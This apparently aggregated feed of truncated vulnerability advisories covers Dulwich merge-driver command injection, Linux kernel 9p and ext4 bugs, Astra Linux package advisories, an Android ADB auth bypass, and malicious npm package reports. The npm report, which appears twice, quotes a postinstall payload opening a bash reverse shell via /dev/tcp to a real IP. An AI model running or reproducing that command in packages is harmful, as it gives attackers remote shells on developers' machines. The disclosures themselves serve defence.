Dulwich Vulnerable to Command Injection via Merge Driver Path

Summary Dulwich's ProcessMergeDriver substitutes the file path from the git tree, controllable by an attacker via a malicious branch into the merge driver command via the %P placeholder and executes it with subprocess.run..., shell=True. An attacker who can cause a victim to merge an untrusted...

WordPress Newses theme <= 2.0.0.77 - Broken Access Control vulnerability

Broken Access Control vulnerability discovered by John P in WordPress Theme Newses versions = 2.0.0.77...

EUVD-2018-21877

SIPp 3.6 and earlier contains a local buffer overflow vulnerability in command-line argument handling that allows local attackers to crash the application or execute arbitrary code. Attackers can trigger the vulnerability by supplying oversized input to the -3pcc, -i, or -logfile parameters,...

Astra Linux - уязвимость в exim4

Exim 4 before 4.94.2 allowed execution with unnecessary privileges. The -oP option is available to the exim user, and it could lead to a denial of service, as files owned by root could be overwritten...

Astra Linux - уязвимость в firefox, thunderbird

When importing an SPKI RSA public key as an ECDSA P-256 key, the key is handled incorrectly, causing the tab to crash. This vulnerability affects Firefox 110, Thunderbird 102.8, and Firefox ESR 102.8...

Astra Linux - уязвимость в linux-5.10, linux-6.1, linux, linux-5.15

In the Linux kernel, the following vulnerability has been resolved: 9p/xen: fixed the issue of releasing IRQs twice. Kernel logs indicate that an IRQ was released twice. The correct device ID must be passed during the IRQ release process. Dominique: removed the confusing variable reset to 0...

Astra Linux - уязвимость в linux-5.10

In the Linux kernel, the following vulnerability has been resolved: clk: sunxi-ng: mp: Fix for double-divider clock rate readback When support for double-divider clocks was introduced, the P-divider offset was left out of the .recalcrate readback function. This caused the clock rate to become...

Astra Linux - уязвимость в binutils

A issue was discovered in cp-demangle.c within GNU libiberty, as distributed in GNU Binutils 2.31. There is a stack consumption problem caused by the cplusdemangletype function making recursive calls to itself in certain scenarios involving many ‘P’ characters...

Exploit for Incorrect Implementation of Authentication Algorithm in Google Android

🔓 CVE-2026-0073 - Android ADB Wireless Debugging Auth Bypass...

MAL-2026-3714 Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

CVE-2026-43249

The CVE-2026-43249 entry describes a race in the Linux kernel 9p/xen frontend: xenwatch and backend change notifications can concurrently call xen_9pfs_front_free, causing a double-free and a general protection fault. The fixes guard the teardown path so only a single caller releases the front-en...

RHCOS 4 : OpenShift Container Platform 4.8.2 (RHSA-2021:2437)

The remote Red Hat Enterprise Linux CoreOS 4 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:2437 advisory. - golang: crypto/elliptic: incorrect operations on the P-224 curve CVE-2021-3114 - gogo/protobuf: plugin/unmarshal/unmarshal.go lack...

Astra Linux - уязвимость в qemu

A flaw was discovered in the implementation of the 9p passthrough filesystem 9pfs in QEMU. The 9pfs server did not prevent the opening of special files on the host side, potentially allowing a malicious client to escape from the exported 9p tree by creating and opening a device file in the shared...

Astra Linux - уязвимость в golang-1.15

In Go versions before 1.14.14 and 1.15.x, as well as before 1.15.7, the crypto/elliptic/p224.go file may generate incorrect outputs due to a underflow of the lowest limb during the final complete reduction of the P-224 field...

Astra Linux - уязвимость в linux-5.15

In the Linux kernel, the following vulnerability has been resolved: 9p: set req refcount to zero to avoid uninitialized usage When a new request is allocated, the refcount will be zero if it is reused, but if the request is newly allocated from slab, it is not fully initialized before being added...

PT-2026-36535

A vulnerability was identified in eyal-gor p 69 branch monkey mcp up to 69bc71874ce40050ef45fde5a435855f18af3373. The affected element is an unknown function of the file branch monkey mcp/bridge and local actions/routes/advanced.py of the component Preview Endpoint. Such manipulation of the...

CVE-2026-6043

CVE-2026-6043 pertains to P4 Server: versions prior to 2026.1 ship with insecure default configurations that, when exposed to untrusted networks, enable unauthenticated attackers to (1) create arbitrary user accounts, (2) enumerate existing users, (3) authenticate to accounts with no password, an...

CVE-2026-31437

A flaw was found in the Linux kernel's netfs component. When a write operation is retried, the netfsunbufferedwrite function can attempt to access a non-existent function, leading to a NULL pointer dereference. This vulnerability can be triggered by specific filesystem configurations, such as 9P,...

EUVD-2026-24786

In the Linux kernel, the following vulnerability has been resolved: ext4: validate pidx bounds in ext4extcorrectindexes ext4extcorrectindexes walks up the extent tree correcting index entries when the first extent in a leaf is modified. Before accessing pathk.pidx-eiblock, there is no validation...